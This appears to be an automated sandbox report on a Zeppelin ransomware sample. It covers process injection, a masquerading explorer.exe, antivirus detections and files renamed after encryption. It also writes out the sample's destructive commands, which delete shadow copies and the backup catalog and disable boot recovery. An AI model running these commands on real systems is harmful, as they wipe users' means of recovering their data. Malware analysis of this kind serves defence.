command	"c:\windows\system32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

Removes the Shadow Copy to avoid recovery of the system (2 events)

cmdline	vssadmin delete shadows /all /quiet
cmdline	wmic shadowcopy delete

Created a process named as a common system process (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 7032 thread_handle: 0x00000284 process_identifier: 3236 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe" -start filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000027c	1	1	0
ShellExecuteExW April 3, 2021, 10:37 a.m.	show_type: 1 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe parameters: -start filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe	1	1	0

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	vssadmin delete shadows /all /quiet
cmdline	"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (18 events)

Time & API	Arguments	Status	Return
NtResumeThread April 3, 2021, 10:37 a.m.	thread_handle: 0x000004cc suspend_count: 1 process_identifier: 2504	1	0
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 7032 thread_handle: 0x00000284 process_identifier: 3236 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe" -start filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000027c	1	1
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 1472 thread_handle: 0x000004dc process_identifier: 7400 current_directory: filepath: track: 1 command_line: notepad.exe filepath_r: stack_pivoted: 0 creation_flags: 134217796 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000004e0	1	1
NtAllocateVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7400 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004dc	1	0
WriteProcessMemory April 3, 2021, 10:37 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\Zeppelin.exe base_address: 0x000b0000 process_identifier: 7400 process_handle: 0x000004dc	1	1
NtAllocateVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7400 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004dc	1	0
WriteProcessMemory April 3, 2021, 10:37 a.m.	buffer: ³suzsuÿsu base_address: 0x00100000 process_identifier: 7400 process_handle: 0x000004dc	1	1
NtAllocateVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7400 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004dc	1	0
WriteProcessMemory April 3, 2021, 10:37 a.m.	buffer: UìÄðVWEð}ð¥¥¥¥hèÿUøÿuüÿUðøtíhÎúÞÿUô_^å]ÂUìÄØSVW3ÒUØUÜUàUüØ3ÀUh¡Ðdÿ0d Û7Uà¸¸Ðè2þÿEàèX\|ýÿPhäÐè=ýÿPè?ýÿEäUÜ¸üÐès2þÿEÜè/\|ýÿPhäÐèýÿPèýÿEèUØ¸0ÑèJ2þÿEØè\|ýÿPhäÐèëýÿPèíýÿEìUü3Àèü(þÿj@h0EüèEýÿÀ@PjSè¥ýÿðuðEøPEüè(ýÿÀ@PEüèýÿPVSè ýÿj@h0jjSèoýÿðEøPjEäPVSè\|ýÿ}øuHj@h0hôjSèBýÿøEøPhôhàÎWSèKýÿ}øôuEôPjVWjjSèýÿÀ3ÀZYYdh¨ÐEØºèÔvýÿEüèÜ}ýÿÃéVoýÿëã_^[å]Ãÿÿÿÿ+ö1Pµ~{º wÔ>Äsý¾P³ãD base_address: 0x00110000 process_identifier: 7400 process_handle: 0x000004dc	1	1
NtResumeThread April 3, 2021, 10:37 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 3236	1	0
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 2776 thread_handle: 0x00000520 process_identifier: 1160 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000528	1	1
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 3908 thread_handle: 0x00000530 process_identifier: 8340 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000052c	1	1
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 4408 thread_handle: 0x00000538 process_identifier: 8704 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000534	1	1
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 8740 thread_handle: 0x00000540 process_identifier: 3360 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000053c	1	1
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 5752 thread_handle: 0x00000548 process_identifier: 5256 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000544	1	1
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 4608 thread_handle: 0x00000550 process_identifier: 5260 current_directory: C:\Users\test22\AppData\Roaming\Microsoft\Windows\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe" -agent 0 filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000054c	1	1
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 6080 thread_handle: 0x00000084 process_identifier: 7316 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\wbem\WMIC.exe track: 1 command_line: wmic shadowcopy delete filepath_r: C:\Windows\System32\Wbem\WMIC.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW April 3, 2021, 10:37 a.m.	thread_identifier: 3180 thread_handle: 0x00000084 process_identifier: 8628 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\vssadmin.exe track: 1 command_line: vssadmin delete shadows /all /quiet filepath_r: C:\Windows\system32\vssadmin.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
McAfee	GenericRXKB-RP!75C1FF39AAC8
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 0055c8001 )
Alibaba	Ransom:Win32/generic.ali2000010
K7GW	Trojan ( 0055c8001 )
Cybereason	malicious.9aac84
Arcabit	Generic.Ransom.Buhtrap.DD13C19F
Cyren	W32/Ransom.LV.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Filecoder.Buran.J
APEX	Malicious
Paloalto	generic.ml
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan.Win32.Agent.gen
BitDefender	Generic.Ransom.Buhtrap.DD13C19F
MicroWorld-eScan	Generic.Ransom.Buhtrap.DD13C19F
Avast	FileRepMalware
Tencent	Win32.Trojan.Agent.Ajbt
Ad-Aware	Generic.Ransom.Buhtrap.DD13C19F
Emsisoft	Generic.Ransom.Buhtrap.DD13C19F (B)
F-Secure	Heuristic.HEUR/Malware
DrWeb	DLOADER.Trojan
TrendMicro	Ransom.Win32.ZEPPELIN.SMTH
McAfee-GW-Edition	BehavesLike.Win32.Generic.dh
MaxSecure	Trojan.Malware.121218.susgen
FireEye	Generic.mg.75c1ff39aac84628
Sophos	Mal/Generic-R + Mal/Behav-010
Ikarus	Trojan-Ransom.Buran
Avira	HEUR/Malware
Gridinsoft	Ransom.Zeppelin.A.sd!yf
Microsoft	Ransom:Win32/Zeppelin.A!MSR
AegisLab	Trojan.Win32.Agent.4!c
ZoneAlarm	HEUR:Trojan.Win32.Agent.gen
GData	Win32.Trojan-Ransom.Zeppelin.E39JD1
AhnLab-V3	Trojan/Win32.BuhTrap.R338445
VBA32	BScope.TrojanRansom.Crypmod
ALYac	Trojan.Ransom.VegaLocker
MAX	malware (ai score=89)
Malwarebytes	Ransom.Zeppelin
TrendMicro-HouseCall	Ransom.Win32.ZEPPELIN.SMTH
Rising	Trojan.Filecoder!8.68 (CLOUD)
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_99%
Fortinet	W32/Buran.H!tr.ransom
BitDefenderTheta	AI:Packer.CD0170E41E
AVG	FileRepMalware
Panda	Trj/GdSda.A

Drops 10881 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 10821 events)

file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\affair\affai129.hwt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\ic_water\iwate_06.drt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\ma_shadow\mapsh_04.drt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\clipart\m_global\global_10.jpg.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\account\accon027.hwt.@karla404.2d0-876-029
file	c:\program files\java\jre7\lib\zi\asia\kuwait.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\clipart\m_background\background_32.jpg.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\clipart\m_school\school_13.png.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\hb_events\event_15.drt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\xml\kor\sample07.hwt.@karla404.2d0-876-029
file	c:\program files (x86)\7-zip\lang\sa.txt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\fonts\encschi.hft.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\ma_common2\mapg2_05.drt.@karla404.2d0-876-029
file	c:\program files\java\jre7\lib\zi\america\indiana\winamac.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\office12\groove\tooldata\groove.net\grooveforms3\bg_adobe.gif.@karla404.2d0-876-029
file	C:\Program Files (x86)\Microsoft Office\Office12\PAGESIZE\PGLBL020.XML
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\fax\fax15.hwt.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\media\office12\autoshap\bd18249_.wmf.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\account\accon167.hwt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\common80\imgfilters\gs\fonts\n019024l.afm.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\clipart\pub60cor\j0103262.wmf.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\clipart\imagebullet\118.png.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\resource\cmap\90pv-rksj-ucs2.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\clipart\m_achieve\achieve_40.png.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\account\accon165.hwt.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\office12\1042\pubftscm\scheme27.css.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\office12\1042\vbe.dev.hxs.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\clipart\m_culture\culture_15.png.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\office12\groove\toolbmps\documentsharetooliconimages.bmp.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\fg_block_arrows\left-right arrow callout.drt.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\office12\pubwiz\dgborder.dpv.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\xml\kor\sample18.hwt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\religion\crist07.hwt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\public\publ006.hwt.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\clipart\pub60cor\in00351_.wmf.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\clipart\m_change\change_09.jpg.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\clipart\pub60cor\j0382836.jpg.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\letter\congra26.hwt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\ic_water\iwate_01.drt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\ki_dolls\kdoll_00.drt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\dg_plane\sh2d1_41.drt.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\clipart\pub60cor\so00222_.wmf.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\clipart\m_banner\banner_50.png.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\dg_decoarrows\arrod_06.drt.@karla404.2d0-876-029
file	C:\Program Files (x86)\Microsoft Office\Office12\DRAT.EXE
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\li_arms\tools_01.drt.@karla404.2d0-876-029
file	c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\lib\gs_cet.ps.@karla404.2d0-876-029
file	c:\program files (x86)\microsoft office\media\office12\bullets\bd21302_.gif.@karla404.2d0-876-029
file	C:\Program Files (x86)\Microsoft Office\Office12\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg
file	c:\program files (x86)\hnc\shared80\clipart\m_achieve\achieve_29.jpg.@karla404.2d0-876-029

Zeppelin.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All